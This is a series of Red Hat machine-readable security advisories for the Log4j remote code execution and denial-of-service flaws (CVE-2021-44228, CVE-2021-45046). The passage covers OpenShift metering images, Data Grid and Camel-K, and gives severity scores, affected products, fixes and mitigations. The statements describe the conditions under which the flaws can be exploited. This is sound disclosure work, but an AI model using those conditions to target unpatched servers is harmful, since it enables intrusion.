Hat Certificate System\n- Red Hat Directory Server\n- Red Hat Identity Management\n- Red Hat CloudForms \n- Red Hat Update Infrastructure\n- Red Hat Satellite\n- Red Hat Ceph Storage\n- Red Hat Gluster Storage\n- Red Hat OpenShift Data Foundation\n- Red Hat OpenStack Platform\n- Red Hat Virtualization\n- Red Hat Single Sign-On\n- Red Hat 3scale API Management",
"title": "Statement"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"8Base-RHOSE-4.7:openshift4/ose-metering-hive@sha256:3ae0917ca765603722b54a392bc5f1edc6c41b6c7d4c5eca95ed99c1d8af3d1c_amd64",
"8Base-RHOSE-4.7:openshift4/ose-metering-presto@sha256:795baa6f38910a8c35d179b8449cd8df3ad7644b9a0a13dad8407519902037e9_amd64"
],
"known_not_affected": [
"8Base-RHOSE-4.7:openshift4/ose-metering-ansible-operator-bundle@sha256:665d34bc3e69cda3c37699051cfee983cf14f6d5f67d56d949652230937dcc90_amd64",
"8Base-RHOSE-4.7:openshift4/ose-metering-ansible-operator@sha256:5a2aa59c1c7a1423ec5fa39eabfc0dfa41cea0db82c9fc1f5c2ce9923ee792f4_amd64",
"8Base-RHOSE-4.7:openshift4/ose-metering-hadoop@sha256:03a4dd392453720b3950efa522682f5d07938c4d36e4269658c5a555afa403e7_amd64"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2021-44228"
},
{
"category": "external",
"summary": "RHBZ#2030932",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2030932"
},
{
"category": "external",
"summary": "RHSB-2021-009",
"url": "https://access.redhat.com/security/vulnerabilities/RHSB-2021-009"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2021-44228",
"url": "https://www.cve.org/CVERecord?id=CVE-2021-44228"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2021-44228",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2021-44228"
},
{
"category": "external",
"summary": "https://github.com/advisories/GHSA-jfh8-c2jp-5v3q",
"url": "https://github.com/advisories/GHSA-jfh8-c2jp-5v3q"
},
{
"category": "external",
"summary": "https://logging.apache.org/log4j/2.x/security.html",
"url": "https://logging.apache.org/log4j/2.x/security.html"
},
{
"category": "external",
"summary": "https://www.lunasec.io/docs/blog/log4j-zero-day/",
"url": "https://www.lunasec.io/docs/blog/log4j-zero-day/"
},
{
"category": "external",
"summary": "https://www.cisa.gov/known-exploited-vulnerabilities-catalog",
"url": "https://www.cisa.gov/known-exploited-vulnerabilities-catalog"
}
],
"release_date": "2021-12-10T02:01:00+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2021-12-16T15:00:19+00:00",
"details": "For OpenShift Container Platform 4.7 see the following documentation, which\nwill be updated shortly for this release, for important instructions on how\nto upgrade your cluster and fully apply this asynchronous errata update:\n\nhttps://docs.openshift.com/container-platform/4.7/release_notes/ocp-4-7-release-notes.html\n\nDetails on how to access this content are available at\nhttps://docs.openshift.com/container-platform/4.7/updating/updating-cluster-cli.html",
"product_ids": [
"8Base-RHOSE-4.7:openshift4/ose-metering-hive@sha256:3ae0917ca765603722b54a392bc5f1edc6c41b6c7d4c5eca95ed99c1d8af3d1c_amd64",
"8Base-RHOSE-4.7:openshift4/ose-metering-presto@sha256:795baa6f38910a8c35d179b8449cd8df3ad7644b9a0a13dad8407519902037e9_amd64"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2021:5107"
},
{
"category": "workaround",
"details": "For Log4j versions \u003e=2.10\nset the system property log4j2.formatMsgNoLookups or the environment variable LOG4J_FORMAT_MSG_NO_LOOKUPS to true\n\nFor Log4j versions \u003e=2.7 and \u003c=2.14.1\nall PatternLayout patterns can be modified to specify the message converter as %m{nolookups} instead of just %m\n\nFor Log4j versions \u003e=2.0-beta9 and \u003c=2.10.0\nremove the JndiLookup class from the classpath. For example: \n```\nzip -q -d log4j-core-*.jar org/apache/logging/log4j/core/lookup/JndiLookup.class\n```\n\nOn OpenShift 4 and in OpenShift Logging, the above mitigation can be applied by following the steps in this article: https://access.redhat.com/solutions/6578421\n\nOn OpenShift 3.11, mitigation to the affected Elasticsearch component can be applied by following the steps in this article: https://access.redhat.com/solutions/6578441",
"product_ids": [
"8Base-RHOSE-4.7:openshift4/ose-metering-ansible-operator-bundle@sha256:665d34bc3e69cda3c37699051cfee983cf14f6d5f67d56d949652230937dcc90_amd64",
"8Base-RHOSE-4.7:openshift4/ose-metering-ansible-operator@sha256:5a2aa59c1c7a1423ec5fa39eabfc0dfa41cea0db82c9fc1f5c2ce9923ee792f4_amd64",
"8Base-RHOSE-4.7:openshift4/ose-metering-hadoop@sha256:03a4dd392453720b3950efa522682f5d07938c4d36e4269658c5a555afa403e7_amd64",
"8Base-RHOSE-4.7:openshift4/ose-metering-hive@sha256:3ae0917ca765603722b54a392bc5f1edc6c41b6c7d4c5eca95ed99c1d8af3d1c_amd64",
"8Base-RHOSE-4.7:openshift4/ose-metering-presto@sha256:795baa6f38910a8c35d179b8449cd8df3ad7644b9a0a13dad8407519902037e9_amd64"
]
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 9.8,
"baseSeverity": "CRITICAL",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"products": [
"8Base-RHOSE-4.7:openshift4/ose-metering-ansible-operator-bundle@sha256:665d34bc3e69cda3c37699051cfee983cf14f6d5f67d56d949652230937dcc90_amd64",
"8Base-RHOSE-4.7:openshift4/ose-metering-ansible-operator@sha256:5a2aa59c1c7a1423ec5fa39eabfc0dfa41cea0db82c9fc1f5c2ce9923ee792f4_amd64",
"8Base-RHOSE-4.7:openshift4/ose-metering-hadoop@sha256:03a4dd392453720b3950efa522682f5d07938c4d36e4269658c5a555afa403e7_amd64",
"8Base-RHOSE-4.7:openshift4/ose-metering-hive@sha256:3ae0917ca765603722b54a392bc5f1edc6c41b6c7d4c5eca95ed99c1d8af3d1c_amd64",
"8Base-RHOSE-4.7:openshift4/ose-metering-presto@sha256:795baa6f38910a8c35d179b8449cd8df3ad7644b9a0a13dad8407519902037e9_amd64"
]
}
],
"threats": [
{
"category": "exploit_status",
"date": "2021-12-10T00:00:00+00:00",
"details": "CISA: https://www.cisa.gov/known-exploited-vulnerabilities-catalog"
},
{
"category": "impact",
"details": "Critical"
}
],
"title": "log4j-core: Remote code execution in Log4j 2.x when logs contain an attacker-controlled string value"
},
{
"cve": "CVE-2021-45046",
"cwe": {
"id": "CWE-400",
"name": "Uncontrolled Resource Consumption"
},
"discovery_date": "2021-12-14T00:00:00+00:00",
"flags": [
{
"label": "vulnerable_code_not_present",
"product_ids": [
"8Base-RHOSE-4.7:openshift4/ose-metering-ansible-operator-bundle@sha256:665d34bc3e69cda3c37699051cfee983cf14f6d5f67d56d949652230937dcc90_amd64",
"8Base-RHOSE-4.7:openshift4/ose-metering-ansible-operator@sha256:5a2aa59c1c7a1423ec5fa39eabfc0dfa41cea0db82c9fc1f5c2ce9923ee792f4_amd64",
"8Base-RHOSE-4.7:openshift4/ose-metering-hadoop@sha256:03a4dd392453720b3950efa522682f5d07938c4d36e4269658c5a555afa403e7_amd64"
]
}
],
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2032580"
}
],
"notes": [
{
"category": "description",
"text": "A flaw was found in the Apache Log4j logging library in versions from 2.0.0 and before 2.16.0. A remote attacker with control over Thread Context Map (MDC) input data could craft malicious input using a JNDI Lookup pattern resulting in remote code execution (RCE) in a limited number of environments.",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "log4j-core: DoS in log4j 2.x with thread context message pattern and context lookup pattern (incomplete fix for CVE-2021-44228)",
"title": "Vulnerability summary"
},
{
"category": "other",
"text": "Although we have matched Apache\u0027s CVSS score, with the exception of the scope metric which will remain unaltered at \"unchanged\"; as we believe code execution would be at the permission levels of the running JVM and not exceeding that of the original CVE-2021-44228 flaw.\n \nWe have given this vulnerability an impact rating of Moderate, this is because of the unlikely nature of log4j lookup mapping values being derived from attacker controlled values. This is not the default configuration for end-applications using log4j 2.x and would require explicit action from a privileged user (a developer or administrator) to access the vulnerability. \nIn certain non-default configurations, it was found that the fix to address CVE-2021-44228 in Apache Log4j 2.15.0 was insufficient.\n\nThis issue affects the log4j version between 2.0 and 2.15. Log4j 1.x is NOT impacted by this vulnerability. \n\nPrerequisites to exploit this flaw are :\n\n- A remotely accessible endpoint with any protocol (HTTP, TCP, etc) that allows an attacker to send arbitrary data,\n- A log statement in the endpoint that logs the attacker controlled data.\n- Log4j configuration file should be explicitly configured to use a non-default Pattern Layout with a Context Lookup eg. ($${ctx:loginId}) \n\nIn most cases, the mitigation suggested for CVE-2021-44228 (i.e. to set the system property `log4j2.noFormatMsgLookup` to `true) does NOT mitigate this specific vulnerability. \nLog4j 2.16.0 fixes this issue by removing support for message lookup patterns and disabling JNDI functionality by default.\n\nFor Elasticsearch, as shipped in OpenShift 3.11, the \"log4j2.formatMsgNoLookups=true\" system property mitigation is sufficient as there are no included non-standard configurations that allow for exploitation:\n\nhttps://github.com/openshift/openshift-ansible/blob/release-3.11/roles/openshift_logging_elasticsearch/templates/log4j2.properties.j2\n\nhttps://discuss.elastic.co/t/apache-log4j2-remote-code-execution-rce-vulnerability-cve-2021-44228-esa-2021-31/291476\n\nFor CodeReady Studio the fix for this flaw is available on CodeReady Studio 12.21.3 and above versions.",
"title": "Statement"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"8Base-RHOSE-4.7:openshift4/ose-metering-hive@sha256:3ae0917ca765603722b54a392bc5f1edc6c41b6c7d4c5eca95ed99c1d8af3d1c_amd64",
"8Base-RHOSE-4.7:openshift4/ose-metering-presto@sha256:795baa6f38910a8c35d179b8449cd8df3ad7644b9a0a13dad8407519902037e9_amd64"
],
"known_not_affected": [
"8Base-RHOSE-4.7:openshift4/ose-metering-ansible-operator-bundle@sha256:665d34bc3e69cda3c37699051cfee983cf14f6d5f67d56d949652230937dcc90_amd64",
"8Base-RHOSE-4.7:openshift4/ose-metering-ansible-operator@sha256:5a2aa59c1c7a1423ec5fa39eabfc0dfa41cea0db82c9fc1f5c2ce9923ee792f4_amd64",
"8Base-RHOSE-4.7:openshift4/ose-metering-hadoop@sha256:03a4dd392453720b3950efa522682f5d07938c4d36e4269658c5a555afa403e7_amd64"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2021-45046"
},
{
"category": "external",
"summary": "RHBZ#2032580",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2032580"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2021-45046",
"url": "https://www.cve.org/CVERecord?id=CVE-2021-45046"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2021-45046",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2021-45046"
},
{
"category": "external",
"summary": "https://access.redhat.com/security/cve/CVE-2021-44228",
"url": "https://access.redhat.com/security/cve/CVE-2021-44228"
},
{
"category": "external",
"summary": "https://logging.apache.org/log4j/2.x/security.html",
"url": "https://logging.apache.org/log4j/2.x/security.html"
},
{
"category": "external",
"summary": "https://www.openwall.com/lists/oss-security/2021/12/14/4",
"url": "https://www.openwall.com/lists/oss-security/2021/12/14/4"
},
{
"category": "external",
"summary": "https://www.cisa.gov/known-exploited-vulnerabilities-catalog",
"url": "https://www.cisa.gov/known-exploited-vulnerabilities-catalog"
}
],
"release_date": "2021-12-14T00:00:00+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2021-12-16T15:00:19+00:00",
"details": "For OpenShift Container Platform 4.7 see the following documentation, which\nwill be updated shortly for this release, for important instructions on how\nto upgrade your cluster and fully apply this asynchronous errata update:\n\nhttps://docs.openshift.com/container-platform/4.7/release_notes/ocp-4-7-release-notes.html\n\nDetails on how to access this content are available at\nhttps://docs.openshift.com/container-platform/4.7/updating/updating-cluster-cli.html",
"product_ids": [
"8Base-RHOSE-4.7:openshift4/ose-metering-hive@sha256:3ae0917ca765603722b54a392bc5f1edc6c41b6c7d4c5eca95ed99c1d8af3d1c_amd64",
"8Base-RHOSE-4.7:openshift4/ose-metering-presto@sha256:795baa6f38910a8c35d179b8449cd8df3ad7644b9a0a13dad8407519902037e9_amd64"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2021:5107"
},
{
"category": "workaround",
"details": "For Log4j versions up to and including 2.15.0, this issue can be mitigated by removing the JndiLookup class from the classpath (example: zip -q -d log4j-core-*.jar org/apache/logging/log4j/core/lookup/JndiLookup.class).",
"product_ids": [
"8Base-RHOSE-4.7:openshift4/ose-metering-ansible-operator-bundle@sha256:665d34bc3e69cda3c37699051cfee983cf14f6d5f67d56d949652230937dcc90_amd64",
"8Base-RHOSE-4.7:openshift4/ose-metering-ansible-operator@sha256:5a2aa59c1c7a1423ec5fa39eabfc0dfa41cea0db82c9fc1f5c2ce9923ee792f4_amd64",
"8Base-RHOSE-4.7:openshift4/ose-metering-hadoop@sha256:03a4dd392453720b3950efa522682f5d07938c4d36e4269658c5a555afa403e7_amd64",
"8Base-RHOSE-4.7:openshift4/ose-metering-hive@sha256:3ae0917ca765603722b54a392bc5f1edc6c41b6c7d4c5eca95ed99c1d8af3d1c_amd64",
"8Base-RHOSE-4.7:openshift4/ose-metering-presto@sha256:795baa6f38910a8c35d179b8449cd8df3ad7644b9a0a13dad8407519902037e9_amd64"
]
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "HIGH",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 8.1,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"products": [
"8Base-RHOSE-4.7:openshift4/ose-metering-ansible-operator-bundle@sha256:665d34bc3e69cda3c37699051cfee983cf14f6d5f67d56d949652230937dcc90_amd64",
"8Base-RHOSE-4.7:openshift4/ose-metering-ansible-operator@sha256:5a2aa59c1c7a1423ec5fa39eabfc0dfa41cea0db82c9fc1f5c2ce9923ee792f4_amd64",
"8Base-RHOSE-4.7:openshift4/ose-metering-hadoop@sha256:03a4dd392453720b3950efa522682f5d07938c4d36e4269658c5a555afa403e7_amd64",
"8Base-RHOSE-4.7:openshift4/ose-metering-hive@sha256:3ae0917ca765603722b54a392bc5f1edc6c41b6c7d4c5eca95ed99c1d8af3d1c_amd64",
"8Base-RHOSE-4.7:openshift4/ose-metering-presto@sha256:795baa6f38910a8c35d179b8449cd8df3ad7644b9a0a13dad8407519902037e9_amd64"
]
}
],
"threats": [
{
"category": "exploit_status",
"date": "2023-05-01T00:00:00+00:00",
"details": "CISA: https://www.cisa.gov/known-exploited-vulnerabilities-catalog"
},
{
"category": "impact",
"details": "Moderate"
}
],
"title": "log4j-core: DoS in log4j 2.x with thread context message pattern and context lookup pattern (incomplete fix for CVE-2021-44228)"
}
]
}
rhsa-2021_5132
Vulnerability from csaf_redhat
Published
2021-12-14 20:03
Modified
2024-12-12 01:18
Summary
Red Hat Security Advisory: Red Hat Data Grid 8.2.2 security update
Notes
Topic
An update for Red Hat Data Grid is now available.
Red Hat Product Security has rated this update as having a security impact of Critical. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.
Details
Red Hat Data Grid is an in-memory, distributed, NoSQL datastore solution. It increases application response times and allows for dramatically improving performance while providing availability, reliability, and elastic scale.
Data Grid 8.2.2 replaces Data Grid 8.2.1 and includes bug fixes and enhancements. Find out more about Data Grid 8.2.2 in the Release Notes [3].
Security Fix(es):
* log4j-core: Remote code execution in Log4j 2.x when logs contain an attacker-controlled string value (CVE-2021-44228)
For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.
Terms of Use
This content is licensed under the Creative Commons Attribution 4.0 International License (https://creativecommons.org/licenses/by/4.0/). If you distribute this content, or a modified version of it, you must provide attribution to Red Hat Inc. and provide a link to the original.
{
"document": {
"aggregate_severity": {
"namespace": "https://access.redhat.com/security/updates/classification/",
"text": "Critical"
},
"category": "csaf_security_advisory",
"csaf_version": "2.0",
"distribution": {
"text": "Copyright \u00a9 Red Hat, Inc. All rights reserved.",
"tlp": {
"label": "WHITE",
"url": "https://www.first.org/tlp/"
}
},
"lang": "en",
"notes": [
{
"category": "summary",
"text": "An update for Red Hat Data Grid is now available.\n \nRed Hat Product Security has rated this update as having a security impact of Critical. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.",
"title": "Topic"
},
{
"category": "general",
"text": "Red Hat Data Grid is an in-memory, distributed, NoSQL datastore solution. It increases application response times and allows for dramatically improving performance while providing availability, reliability, and elastic scale.\n \nData Grid 8.2.2 replaces Data Grid 8.2.1 and includes bug fixes and enhancements. Find out more about Data Grid 8.2.2 in the Release Notes [3].\n\nSecurity Fix(es):\n\n* log4j-core: Remote code execution in Log4j 2.x when logs contain an attacker-controlled string value (CVE-2021-44228)\n\nFor more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.",
"title": "Details"
},
{
"category": "legal_disclaimer",
"text": "This content is licensed under the Creative Commons Attribution 4.0 International License (https://creativecommons.org/licenses/by/4.0/). If you distribute this content, or a modified version of it, you must provide attribution to Red Hat Inc. and provide a link to the original.",
"title": "Terms of Use"
}
],
"publisher": {
"category": "vendor",
"contact_details": "https://access.redhat.com/security/team/contact/",
"issuing_authority": "Red Hat Product Security is responsible for vulnerability handling across all Red Hat products and services.",
"name": "Red Hat Product Security",
"namespace": "https://www.redhat.com"
},
"references": [
{
"category": "self",
"summary": "https://access.redhat.com/errata/RHSA-2021:5132",
"url": "https://access.redhat.com/errata/RHSA-2021:5132"
},
{
"category": "external",
"summary": "https://access.redhat.com/security/updates/classification/#critical",
"url": "https://access.redhat.com/security/updates/classification/#critical"
},
{
"category": "external",
"summary": "https://access.redhat.com/jbossnetwork/restricted/softwareDetail.html?softwareId=70381\u0026product=data.grid\u0026version=8.2\u0026downloadType=patches",
"url": "https://access.redhat.com/jbossnetwork/restricted/softwareDetail.html?softwareId=70381\u0026product=data.grid\u0026version=8.2\u0026downloadType=patches"
},
{
"category": "external",
"summary": "https://access.redhat.com/documentation/en-us/red_hat_data_grid/8.2/html-single/red_hat_data_grid_8.2_release_notes/index",
"url": "https://access.redhat.com/documentation/en-us/red_hat_data_grid/8.2/html-single/red_hat_data_grid_8.2_release_notes/index"
},
{
"category": "external",
"summary": "https://access.redhat.com/security/vulnerabilities/RHSB-2021-009",
"url": "https://access.redhat.com/security/vulnerabilities/RHSB-2021-009"
},
{
"category": "external",
"summary": "2030932",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2030932"
},
{
"category": "self",
"summary": "Canonical URL",
"url": "https://security.access.redhat.com/data/csaf/v2/advisories/2021/rhsa-2021_5132.json"
}
],
"title": "Red Hat Security Advisory: Red Hat Data Grid 8.2.2 security update",
"tracking": {
"current_release_date": "2024-12-12T01:18:29+00:00",
"generator": {
"date": "2024-12-12T01:18:29+00:00",
"engine": {
"name": "Red Hat SDEngine",
"version": "4.2.3"
}
},
"id": "RHSA-2021:5132",
"initial_release_date": "2021-12-14T20:03:50+00:00",
"revision_history": [
{
"date": "2021-12-14T20:03:50+00:00",
"number": "1",
"summary": "Initial version"
},
{
"date": "2021-12-14T20:03:50+00:00",
"number": "2",
"summary": "Last updated version"
},
{
"date": "2024-12-12T01:18:29+00:00",
"number": "3",
"summary": "Last generated version"
}
],
"status": "final",
"version": "3"
}
},
"product_tree": {
"branches": [
{
"branches": [
{
"branches": [
{
"category": "product_name",
"name": "Red Hat Data Grid 8.2.2",
"product": {
"name": "Red Hat Data Grid 8.2.2",
"product_id": "Red Hat Data Grid 8.2.2",
"product_identification_helper": {
"cpe": "cpe:/a:redhat:jboss_data_grid:8.2"
}
}
}
],
"category": "product_family",
"name": "Red Hat JBoss Data Grid"
}
],
"category": "vendor",
"name": "Red Hat"
}
]
},
"vulnerabilities": [
{
"cve": "CVE-2021-44228",
"cwe": {
"id": "CWE-20",
"name": "Improper Input Validation"
},
"discovery_date": "2021-12-10T00:00:00+00:00",
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2030932"
}
],
"notes": [
{
"category": "description",
"text": "A flaw was found in the Apache Log4j logging library in versions from 2.0.0 and before 2.15.0. A remote attacker who can control log messages or log message parameters, can execute arbitrary code on the server via JNDI LDAP endpoint.",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "log4j-core: Remote code execution in Log4j 2.x when logs contain an attacker-controlled string value",
"title": "Vulnerability summary"
},
{
"category": "other",
"text": "This issue only affects log4j versions between 2.0 and 2.14.1. In order to exploit this flaw you need:\n- A remotely accessible endpoint with any protocol (HTTP, TCP, etc) that allows an attacker to send arbitrary data,\n- A log statement in the endpoint that logs the attacker controlled data.\n\nIn Red Hat OpenShift Logging the vulnerable log4j library is shipped in the Elasticsearch components. Because Elasticsearch is not susceptible to remote code execution with this vulnerability due to use of the Java Security Manager and because access to these components is limited, the impact by this vulnerability is reduced to Moderate.\n\nAs per upstream applications using Log4j 1.x may be impacted by this flaw if their configuration uses JNDI. However, the risk is much lower. This flaw in Log4j 1.x is tracked via https://access.redhat.com/security/cve/CVE-2021-4104 and has been rated as having Moderate security impact.\n\nCodeReady Studio version 12.21.1 was released containing a fix for this vulnerability.\n\nThe following products are NOT affected by this flaw and have been explicitly listed here for the benefit of our customers.\n- Red Hat Enterprise Linux\n- Red Hat Advanced Cluster Management for Kubernetes \n- Red Hat Advanced Cluster Security for Kubernetes\n- Red Hat Ansible Automation Platform (Engine and Tower)\n- Red Hat Certificate System\n- Red Hat Directory Server\n- Red Hat Identity Management\n- Red Hat CloudForms \n- Red Hat Update Infrastructure\n- Red Hat Satellite\n- Red Hat Ceph Storage\n- Red Hat Gluster Storage\n- Red Hat OpenShift Data Foundation\n- Red Hat OpenStack Platform\n- Red Hat Virtualization\n- Red Hat Single Sign-On\n- Red Hat 3scale API Management",
"title": "Statement"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"Red Hat Data Grid 8.2.2"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2021-44228"
},
{
"category": "external",
"summary": "RHBZ#2030932",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2030932"
},
{
"category": "external",
"summary": "RHSB-2021-009",
"url": "https://access.redhat.com/security/vulnerabilities/RHSB-2021-009"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2021-44228",
"url": "https://www.cve.org/CVERecord?id=CVE-2021-44228"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2021-44228",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2021-44228"
},
{
"category": "external",
"summary": "https://github.com/advisories/GHSA-jfh8-c2jp-5v3q",
"url": "https://github.com/advisories/GHSA-jfh8-c2jp-5v3q"
},
{
"category": "external",
"summary": "https://logging.apache.org/log4j/2.x/security.html",
"url": "https://logging.apache.org/log4j/2.x/security.html"
},
{
"category": "external",
"summary": "https://www.lunasec.io/docs/blog/log4j-zero-day/",
"url": "https://www.lunasec.io/docs/blog/log4j-zero-day/"
},
{
"category": "external",
"summary": "https://www.cisa.gov/known-exploited-vulnerabilities-catalog",
"url": "https://www.cisa.gov/known-exploited-vulnerabilities-catalog"
}
],
"release_date": "2021-12-10T02:01:00+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2021-12-14T20:03:50+00:00",
"details": "To install this update, do the following:\n \n1. Download the Data Grid 8.2.2 server patch from the customer portal[\u00b2].\n2. Back up your existing Data Grid installation. You should back up databases, configuration files, and so on.\n3. Install the Data Grid 8.2.2 server patch. Refer to the 8.2.2 Release Notes[\u00b3] for patching instructions.\n4. Restart Data Grid to ensure the changes take effect.",
"product_ids": [
"Red Hat Data Grid 8.2.2"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2021:5132"
},
{
"category": "workaround",
"details": "For Log4j versions \u003e=2.10\nset the system property log4j2.formatMsgNoLookups or the environment variable LOG4J_FORMAT_MSG_NO_LOOKUPS to true\n\nFor Log4j versions \u003e=2.7 and \u003c=2.14.1\nall PatternLayout patterns can be modified to specify the message converter as %m{nolookups} instead of just %m\n\nFor Log4j versions \u003e=2.0-beta9 and \u003c=2.10.0\nremove the JndiLookup class from the classpath. For example: \n```\nzip -q -d log4j-core-*.jar org/apache/logging/log4j/core/lookup/JndiLookup.class\n```\n\nOn OpenShift 4 and in OpenShift Logging, the above mitigation can be applied by following the steps in this article: https://access.redhat.com/solutions/6578421\n\nOn OpenShift 3.11, mitigation to the affected Elasticsearch component can be applied by following the steps in this article: https://access.redhat.com/solutions/6578441",
"product_ids": [
"Red Hat Data Grid 8.2.2"
]
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 9.8,
"baseSeverity": "CRITICAL",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"products": [
"Red Hat Data Grid 8.2.2"
]
}
],
"threats": [
{
"category": "exploit_status",
"date": "2021-12-10T00:00:00+00:00",
"details": "CISA: https://www.cisa.gov/known-exploited-vulnerabilities-catalog"
},
{
"category": "impact",
"details": "Critical"
}
],
"title": "log4j-core: Remote code execution in Log4j 2.x when logs contain an attacker-controlled string value"
}
]
}
rhsa-2021_5130
Vulnerability from csaf_redhat
Published
2021-12-14 17:55
Modified
2024-12-12 01:17
Summary
Red Hat Security Advisory: Red Hat Integration Camel-K 1.6.2 release and security update
Notes
Topic
A minor version update (from 1.6.1 to 1.6.2) is now available for Red Hat Integration Camel K that includes bug fixes. The purpose of this text-only errata is to inform you about the security issues fixed in this release.
Red Hat Product Security has rated this update as having a security impact of Critical. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.
Details
A minor version update (from 1.6.1 to 1.6.2) is now available for Red Hat Camel K that includes bug fixes and enhancements, which are documented in the Release Notes document linked to in the References.
Security Fix(es):
* log4j-core: Remote code execution in Log4j 2.x when logs contain an attacker-controlled string value (CVE-2021-44228)
For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.
Terms of Use
This content is licensed under the Creative Commons Attribution 4.0 International License (https://creativecommons.org/licenses/by/4.0/). If you distribute this content, or a modified version of it, you must provide attribution to Red Hat Inc. and provide a link to the original.
{
"document": {
"aggregate_severity": {
"namespace": "https://access.redhat.com/security/updates/classification/",
"text": "Critical"
},
"category": "csaf_security_advisory",
"csaf_version": "2.0",
"distribution": {
"text": "Copyright \u00a9 Red Hat, Inc. All rights reserved.",
"tlp": {
"label": "WHITE",
"url": "https://www.first.org/tlp/"
}
},
"lang": "en",
"notes": [
{
"category": "summary",
"text": "A minor version update (from 1.6.1 to 1.6.2) is now available for Red Hat Integration Camel K that includes bug fixes. The purpose of this text-only errata is to inform you about the security issues fixed in this release.\n\nRed Hat Product Security has rated this update as having a security impact of Critical. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.",
"title": "Topic"
},
{
"category": "general",
"text": "A minor version update (from 1.6.1 to 1.6.2) is now available for Red Hat Camel K that includes bug fixes and enhancements, which are documented in the Release Notes document linked to in the References.\n\nSecurity Fix(es):\n\n* log4j-core: Remote code execution in Log4j 2.x when logs contain an attacker-controlled string value (CVE-2021-44228)\n\nFor more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.",
"title": "Details"
},
{
"category": "legal_disclaimer",
"text": "This content is licensed under the Creative Commons Attribution 4.0 International License (https://creativecommons.org/licenses/by/4.0/). If you distribute this content, or a modified version of it, you must provide attribution to Red Hat Inc. and provide a link to the original.",
"title": "Terms of Use"
}
],
"publisher": {
"category": "vendor",
"contact_details": "https://access.redhat.com/security/team/contact/",
"issuing_authority": "Red Hat Product Security is responsible for vulnerability handling across all Red Hat products and services.",
"name": "Red Hat Product Security",
"namespace": "https://www.redhat.com"
},
"references": [
{
"category": "self",
"summary": "https://access.redhat.com/errata/RHSA-2021:5130",
"url": "https://access.redhat.com/errata/RHSA-2021:5130"
},
{
"category": "external",
"summary": "https://access.redhat.com/security/updates/classification/#critical",
